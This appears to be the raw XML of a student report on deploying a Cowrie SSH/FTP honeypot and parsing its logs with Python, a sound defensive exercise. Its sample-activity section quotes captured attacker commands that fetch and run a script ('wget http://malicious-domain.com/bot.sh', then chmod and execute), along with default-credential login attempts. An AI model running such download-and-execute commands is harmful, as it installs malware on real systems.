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8108" w14:textId="77777777" w:rsidR="008572A8" w:rsidRPr="008572A8" w:rsidRDefault="008572A8" w:rsidP="008572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2A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>HONEYPOT SERVER TO DETECT ATTACK PATTERNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E8CEEC" w14:textId="77777777" w:rsidR="008572A8" w:rsidRPr="008572A8" w:rsidRDefault="008572A8" w:rsidP="008572A8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008572A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C57045B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In today’s digital era, cyberattacks such as brute force, credential guessing, and malware installation attempts are common against exposed systems. To understand attacker </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008572A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008572A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> and strengthen </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008572A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008572A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, organizations deploy honeypots, which are decoy systems designed to lure attackers. This project focuses on setting up a honeypot server that captures malicious login attempts, records attacker activity, and provides insights into attack strategies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614F01FB" w14:textId="77777777" w:rsidR="008572A8" w:rsidRPr="008572A8" w:rsidRDefault="008572A8" w:rsidP="008572A8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008572A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Abstract</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0BDBD1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The objective of this project is to design a honeypot environment that simulates vulnerable services like SSH/FTP to attract attackers. Using the Cowrie honeypot framework, the system captures detailed logs of brute-force login attempts and attacker commands. Additionally, custom Python scripts are used to parse logs, extract important details such as source IPs and attempted credentials, and visualize patterns in attacker </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008572A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008572A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. By emulating vulnerable services in a safe environment, this honeypot provides valuable intelligence on cyber threats and helps improve defensive measures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FCAE66" w14:textId="77777777" w:rsidR="008572A8" w:rsidRPr="008572A8" w:rsidRDefault="008572A8" w:rsidP="008572A8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008572A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tools Used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBB7837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Cowrie – A medium-interaction honeypot that emulates SSH/FTP services and records attacker interactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFFA4E1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Custom Python Scripts – Developed to parse Cowrie logs, filter useful data, and automate reporting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10652FD9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SSH/FTP Emulation – Simulated login services to attract attackers attempting brute-force or unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E93EB9" w14:textId="77777777" w:rsidR="008572A8" w:rsidRPr="008572A8" w:rsidRDefault="008572A8" w:rsidP="008572A8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008572A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Steps Involved in Building the Project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5317FD19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Setup Environment – A Linux virtual machine was prepared to safely deploy the honeypot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A558345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Installation of Cowrie – Cowrie was configured to emulate SSH/FTP services and log all incoming activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D99CA15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Capturing Attacker Activity – The honeypot recorded login attempts, IP addresses, and commands entered by intruders.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEA3D34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Custom Python Script Development – Scripts were written to parse Cowrie log files, extract failed login attempts, and summarize frequently used passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483AC8DC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Visualization of Results – The extracted data was processed to identify patterns, such as repeated attack attempts from the same IPs or common brute-force passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12387904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</w:p>
    <w:p w14:paraId="4DF5C0E3" w14:textId="77777777" w:rsidR="008572A8" w:rsidRDefault="008572A8" w:rsidP="008572A8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="560319C8" w14:textId="77777777" w:rsidR="008572A8" w:rsidRDefault="008572A8" w:rsidP="008572A8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B8740CF" w14:textId="67F5A68B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lastRenderedPageBreak/>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F25D262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The honeypot server successfully attracted and recorded multiple brute-force login attempts and suspicious commands. Cowrie provided detailed logs of attacker interactions, while custom Python scripts automated the extraction and analysis of key information. The SSH/FTP emulation effectively deceived attackers into revealing their methods. This project demonstrates that honeypots are a powerful tool for studying attacker </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008572A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008572A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> and strengthening overall cybersecurity </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008572A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008572A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5904C235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</w:p>
    <w:p w14:paraId="269B4578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Sample Activity </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC4DABF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</w:p>
    <w:p w14:paraId="7408962B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1. Cowrie Log – Failed SSH Login Attempts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0875E616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2025-09-07 14:22:11+0000 login attempt [root/12345] failed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E089437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2025-09-07 14:22:15+0000 login attempt [admin/admin] failed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2ABAA1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2025-09-07 14:22:22+0000 login attempt [root/password] failed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74467240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</w:p>
    <w:p w14:paraId="4D99F131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2. Cowrie Captured Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C6CD07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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008572A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008572A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://malicious-domain.com/bot.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B4526B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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008572A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008572A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> +x bot.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECABAA5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./bot.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22673BBD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</w:p>
    <w:p w14:paraId="6D6B756F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3. Python Script Parsing Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8510DE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Top Attacker IPs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E50411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 - 45.33.12.34 (15 attempts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D9DDD6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 - 185.220.101.5 (9 attempts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26203688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>Most Common Passwords Tried:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD8C670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 - admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63419804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 - 12345</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6671CFC8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  <w:r w:rsidRPr="008572A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> - password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36310C3E" w14:textId="77777777" w:rsidR="008572A8" w:rsidRPr="008572A8" w:rsidRDefault="008572A8" w:rsidP="008572A8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="008572A8" w:rsidRPr="0085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39D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="82A2F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1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A8"/>
    <w:rsid w:val="005C2CB0"/>
    <w:rsid w:val="008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272C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{25A49841-AE69-463A-B22B-A60BB6AF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Kanuganti</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Girija Kanuganti</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <cp:lastPrinted>2025-09-08T14:06:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-08T14:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-08T14:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>